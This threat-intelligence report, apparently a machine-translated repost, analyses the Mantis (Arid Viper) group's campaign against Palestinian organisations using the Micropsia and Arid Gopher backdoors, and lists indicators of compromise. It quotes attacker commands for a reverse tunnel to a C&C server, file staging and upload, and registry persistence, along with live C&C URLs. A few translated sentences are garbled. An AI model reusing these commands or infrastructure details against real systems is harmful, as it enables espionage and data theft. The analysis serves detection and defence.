Mantis: New tool used in attacks on Palestinian targets

Espionage groups invest time and effort in avoiding detection and persisting on compromised networks.
The Mantis cyber espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to operate within the Palestinian territories, is conducting ongoing attacks, deploying an updated toolset and sparing no effort in targeting targets. Maintain a persistent presence on the web.
The group is known for targeting organizations in the Middle East, but the recent activity discovered by Symantec, a subsidiary of Broadcom Software, is focused on organizations in the Palestinian territories. The malicious activity began in September 2022 and continued until at least February 2023. moon. This kind of targeting is not unprecedented for the Mantis group, which previously revealed attacks against individuals located in the Palestinian territories in 2017.

background

Mantis has been active since 2014, and some third-party reports indicate it may have been active as early as 2011. The group is known for targeting organizations in Israel and a number of other Middle Eastern countries. Target areas include government, military, finance, media, education, energy and think tanks. The group is known for using phishing emails and fake social media profiles to trick targets into installing malware on their devices.

Mantis are widely believed to have ties to the Palestinian territories. Symantec was unable to make clear attributions to any Palestinian organization, although other vendors linked the group to Hamas.

In its latest attack, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to infect targets, followed by widespread credential theft and exfiltration of stolen data.

attack chain

The initial route of infection at this event is unclear. In one targeted organization, the attackers deployed three different versions of the same toolset (i.e., different variations of the same tools) on three groups of computers. Isolating the attack in this way is most likely a preventive measure. If one of these toolsets is discovered, the attacker will still be able to maintain a persistent presence on the target network.

The following is a description of the use of one of the three toolsets:

Malicious activity was first detected on December 18, 2022. Three separate sets of obfuscated PowerShell commands were executed to load a Base64-encoded string that launched the embedded shellcode. The shellcode is a 32-bit bootloader that uses basic TCP protocol to download another stage from the command and control (C&C) server: 104.194.222[.]50 port 4444.

The attackers returned on December 19, first performing a credential dump and then using Certutil and BITSAdmin to download the Micropsia backdoor and Putty, a publicly available SSH client.

Micropsia then executes and begins contacting the C&C server. On the same day, Micropsia was also executed on three other machines in the same organization. In each case, it runs in a folder named after its file name:

csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
On a computer, Micropsia is used to set up a reverse socks tunnel to an external IP address:

CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]

On December 20, Micropsia was used to run an unknown executable file called windowspackages.exe on one of the infected computers.

The next day, December 21, RAR was executed to archive files on another infected computer.

From December 22 to January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three infected computers. The Arid Gopher is in turn used to run a tool called SetRegRunKey.exe, which provides persistence by adding the Arid Gopher in the registry to execute across reboots. It also ran an unknown file called localsecuritypolicy.exe (the attackers used this filename elsewhere as the Arid Gopher backdoor).

On December 28, Micropsia was used to run windowspackages.exe on three additional infected computers.

On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two infected computers.

By January 2, the attackers deactivated the version of Arid Gopher they were using and introduced a new variant. Is this because the first version was discovered, or the standard operating procedure is unclear.

On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, from the folder: csidl_common_appdata\hostupbroker\hostupbroker.exe on a single computer. This is followed by the leak of the RAR file:

CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

On January 9, Arid Gopher was used to execute two unknown files on a single computer:

csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
The last malicious activity occurred after January 12, when Arid Gopher was used to execute an unknown file named localsecuritypolicy.exe every ten hours.

Micropsia

The Micropsia backdoor variant used in these attacks appears to be a slightly updated version of the version seen by other vendors. In this event, Micropsia deployed using multiple filenames and file paths:

csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia executes using WMI and its main purpose appears to be to run the attacker's secondary payload. These include:

Arid Gopher (File name: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler (aka Revsocks) (File name: windowsservicemanageav.exe)
Data exfiltration tool (file name: windowsupserv.exe)
Two unknown files, both named hostupbroker.exe
Unknown file named windowspackages.exe
In addition to this, Micropsia has its own features such as screenshots, keylogging, and the use of WinRAR to archive certain file types in preparation for data exfiltration:

"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PRO GRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROFILE %*.pptx” “%USERPROFILE%*.odt” “%USERPROFILE% *.mdb” “%USERPROFILE%*.accdb” “%USERPROFILE%*.accde” “%USERPROFILE%*.txt” “%USERPROFILE%*.rtf” “%USERPROFILE%*.vcf”

Arid Gopher

Arid Gopher is different from Micropsia, which is written in Delphi. Arid Gopher is written in Go language. The version of Arid Gopher used in this event contains the following embedded components:

7za.exe – a copy of a legitimate 7-Zip executable
AttestationWmiProvider.exe – A tool for setting the “run” registry value
ServiceHubIdentityHost.exe – A copy of Optimum X’s legitimate Shortcut.exe executable
Setup.env – Configuration file
Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe, and networkuefidiagsbootserver.exe. In addition, it was used to download and execute files obfuscated using PyArmor.

When communicating with the C&C server, the Arid Gopher registers the device on one path and then connects to another path, presumably to receive commands:

Connect to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – possibly to register the device
Next is: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands
Connect to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – possibly to register the device
Next is: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands

Arid Gopher appears to be regularly updated and rewritten by attackers, most likely to evade detection. One variant of the malware differs sufficiently from the previous version's unique code that no subroutine contains the same unique code as the previous version. Mantis seems to actively shift logic between variants, which is a time-consuming operation if done manually.

Command Description
"c" Perhaps related to main.exC("cmd")
"d" Perhaps related to main.down2
"s" Perhaps related to main.OnDSH
"ci" Perhaps related to main.deviceProperties
"ps" Perhaps related to main.exC("powershell")
"ra" Perhaps related to main.RunAWithoutW
"sf" Perhaps related to main.updateSettings
"sl" Perhaps related to main.searchForLogs
"ua" Perhaps related to main.updateApp
"ut" Perhaps related to main.updateT
"pwnr" Perhaps related to main.exCWithoutW("powershell")
"rapp" Perhaps related to main.restartApp
"gelog" Perhaps related to main.upAppLogs
"ufbtt" Perhaps related to main.collectFi
"ufofd" Perhaps related to main.collectFiOrFol
"bwp" Perhaps related to main.browDat
"cbh" Perhaps related to main.delBD
"cwr" Perhaps related to main.exCWithoutW("cmd")
"gaf" Perhaps related to main.collectFi
"ntf" Perhaps related to main.collectNet
"smr" Perhaps related to main.updateSettings

The embedded setup.env file is used by an analyzed Arid Gopher variant to retrieve configuration data and contains the following content:

DIR=WindowsPerceptionService

ENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER

LOGS=logs.txt

DID=code.txt

VER=6.1

EN=2

ST_METHOD=r

ST_MACHINE=false

ST_FLAGS=x

COMPRESSOR=7za.exe

DDIR=ResourcesFiles

BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002

SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB

STAPP=AttestationWmiProvider.exe

SHORT_APP=ServiceHubIdentityHost.exe

The setup.env configuration file mentions another file, AttestationWmiProvider.exe, also embedded in the Arid Gopher. This file is a 32-bit executable that acts as a helper, ensuring that another executable runs on reboot. When it executes, it checks the following command line parameters:

"key" with string parameter [RUN_VALUE_NAME]

"value" with string parameter [RUN_PATHNAME]

It then arranges to receive signal notifications using func os/signal.Notify(). Once notified, it sets the following registry value:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”

Our investigation so far shows that this file sets Arid Gopher to run on reboot:

CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”

Data Breach Tools

The attackers also used a custom tool to exfiltrate data stolen from target organizations: a 64-bit PyInstaller executable named WindowsUpServ.exe. When run, the tool checks the following command line parameters:

“-d” “[FILE_DIRECTORY]”

"-f" "[FILENAME]"

For each "-f" "[FILENAME]" command line argument, the tool uploads the contents of [FILENAME]. For each "-d" "[FILE_DIRECTORY]" command line argument, the tool gets the list of files stored in the folder [FILE_DIRECTORY] and uploads the contents of each file.

When each file is uploaded, the tool sends an HTTP POST request to the C&C server with the following parameters:

"kjdfnqweb": [THE_FILE_CONTENT]

"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]

Whenever the remote server responds with status code 200, the malware deletes the uploaded files from the local disk. Malware may also log some of its behavior in the following files:

"C:\ProgramData\WindowsUpServ\success.txt"

"C:\ProgramData\WindowsUpServ\err.txt"

a staunch opponent

Mantis appears to be a determined adversary willing to invest time and effort to maximize its chances of success, as evidenced by its extensive malware rewrites and its splitting attacks against individual organizations into separate parts to reduce detection of the entire operation. The opportunity to arrive can be seen.

IOC indicator

SHA256 hash File name Description
0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 networkvirtualizationservice.exe Arid Gopher
3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 networkvirtualizationpicservice.exe Arid Gopher
82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 networkvirtualizationfiaservice.exe Arid Gopher
85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 networkvirtualizationinithservice.exe Arid Gopher
cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 networkvirtualizationfiaservice.exe Arid Gopher
f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 networkvirtualizationstartservice.exe Arid Gopher
21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 AttestationWmiProvider.exe Arid Gopher persistence component
58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 windowsupserv.exe Exfiltration tool
5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e windowsupserv.exe Exfiltration tool
0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 Various Micropsia
1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa N/A Micropsia
211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d xboxaccessorymanagementservice.exe Micropsia
d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 systempropertiesinternationaltime.exe Micropsia
5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 networkvirtualizationseoservice.exe Possible Arid Gopher
f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 runme.exe Possible Meterpreter
c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b systempropertiesinternationaltime.exe Possible Micropsia
f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb windowsservicemanageav.exe ReverseSocksTunnel
411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 N/A Shellcode
5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d N/A Shellcode
6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 N/A Shellcode
11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e SystemPropertiesInternationalTime.rar Unknown file
1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 networkswitcherdatamodell.exe Unknown file
220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c hostupbroker.exe Unknown file
4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f hostupbroker.exe Unknown file
4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 windowspackages.exe Unknown file
624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 _pytransform.dll Unknown file
7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 embeddedmodeservice.exe Unknown file
8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 localsecuritypolicy.exe Unknown file
b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 embeddedmodeservice.exe Unknown file
bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 localsecuritypolicy.exe Unknown file
bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 networkuefidiagsbootserver.exe Unknown file
d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 teamviewrremoteservice.exe Unknown file
jumpstartmail[.]com Arid Gopher C&C
paydayloansnew[.]com Arid Gopher C&C
picture-world[.]info Arid Gopher C&C
rnacgroup[.]com C&C
salimafia[.]net Arid Gopher C&C
seomoi[.]net Arid Gopher C&C
soft-utils[.]com C&C
chloe-boreman[.]com Micropsia C&C
criston-cole[.]com Micropsia C&C
http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu Exfiltration tool C&C

 

Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/mantis-used-in-attacks-against-palestinian-targets-html

Like (1)
Previous November 29, 2023 10:01 pm
Next December 3, 2023 9:11 am

related suggestion